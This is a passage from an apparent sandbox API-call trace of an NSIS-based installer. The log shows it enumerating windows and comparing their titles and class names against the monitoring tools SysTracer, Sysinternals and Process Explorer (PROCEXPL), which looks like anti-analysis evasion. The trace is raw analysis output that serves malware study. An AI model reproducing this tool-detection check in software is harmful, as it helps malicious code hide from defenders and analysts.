lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.606] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.606] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.606] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.607] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.607] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.607] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.607] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.607] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.607] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.607] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.607] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software 
SysTracer") returned="Blue Project Software SysTracer" [0158.607] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.608] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.608] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.608] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.608] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.608] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.608] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrlenA (lpString="0") returned 1 [0158.608] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.608] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.608] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.608] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.608] lstrlenA (lpString="0") returned 1 [0158.608] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrlenA (lpString="") returned 0 [0158.609] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA 
(in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.609] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.609] lstrlenA (lpString="3399936") returned 7 [0158.609] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.609] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.609] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.609] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.609] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.609] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.609] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrlenA (lpString="") returned 0 [0158.609] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.609] lstrcpynA (in: lpString1=0x432c00, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrlenA (lpString="") returned 0 [0158.610] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrlenA (lpString="") returned 0 [0158.610] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.610] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.610] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.610] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.610] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.610] lstrcpynA (in: lpString1=0x40a418, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.610] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.610] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.611] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.611] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.611] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.611] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.611] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.611] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.611] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.611] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.611] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.611] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", 
iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.612] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.612] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.612] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.612] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.612] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.612] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.612] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.612] lstrlenA (lpString="0") returned 1 [0158.612] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.612] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.612] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.612] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.613] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.613] lstrcpynA (in: lpString1=0x430000, lpString2="0", 
iMaxLength=1024 | out: lpString1="0") returned="0" [0158.613] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.613] lstrlenA (lpString="0") returned 1 [0158.613] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.613] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.613] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.613] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.613] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.613] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.613] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.613] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.613] lstrcpynA (in: 
lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.613] lstrlenA (lpString="3399936") returned 7 [0158.614] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.614] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.614] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.614] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.614] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.614] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.614] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.614] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.614] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.614] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.614] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65694") returned 5 [0158.614] lstrcpyA (in: lpString1=0x430400, lpString2="65694" | out: lpString1="65694") returned="65694" [0158.615] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcpynA (in: lpString1=0x33723c, 
lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrlenA (lpString="callback1") returned 9 [0158.615] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.615] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.615] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.615] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.615] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.615] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.615] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.615] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.615] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.615] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.616] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.616] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.616] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.616] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.616] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.616] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.616] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.616] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.616] lstrcpynA (in: 
lpString1=0x341200, lpString2="65694", iMaxLength=1024 | out: lpString1="65694") returned="65694" [0158.616] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.616] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.617] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.617] GetWindowTextA (in: hWnd=0x1009e, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.617] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.617] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.617] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.617] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65694") returned 5 [0158.617] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.617] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.617] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.617] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.617] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.617] lstrcpynA (in: 
lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.617] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.617] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.617] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.617] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.618] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.618] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.618] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.618] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.618] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.618] lstrcpyA (in: lpString1=0x327e20, 
lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.618] lstrcpynA (in: lpString1=0x3401e0, lpString2="65694", iMaxLength=1024 | out: lpString1="65694") returned="65694" [0158.618] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.618] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.618] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.618] GetClassNameA (in: hWnd=0x1009e, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.618] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.618] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.618] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.618] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65694") returned 5 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.619] lstrlenA (lpString="0") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: 
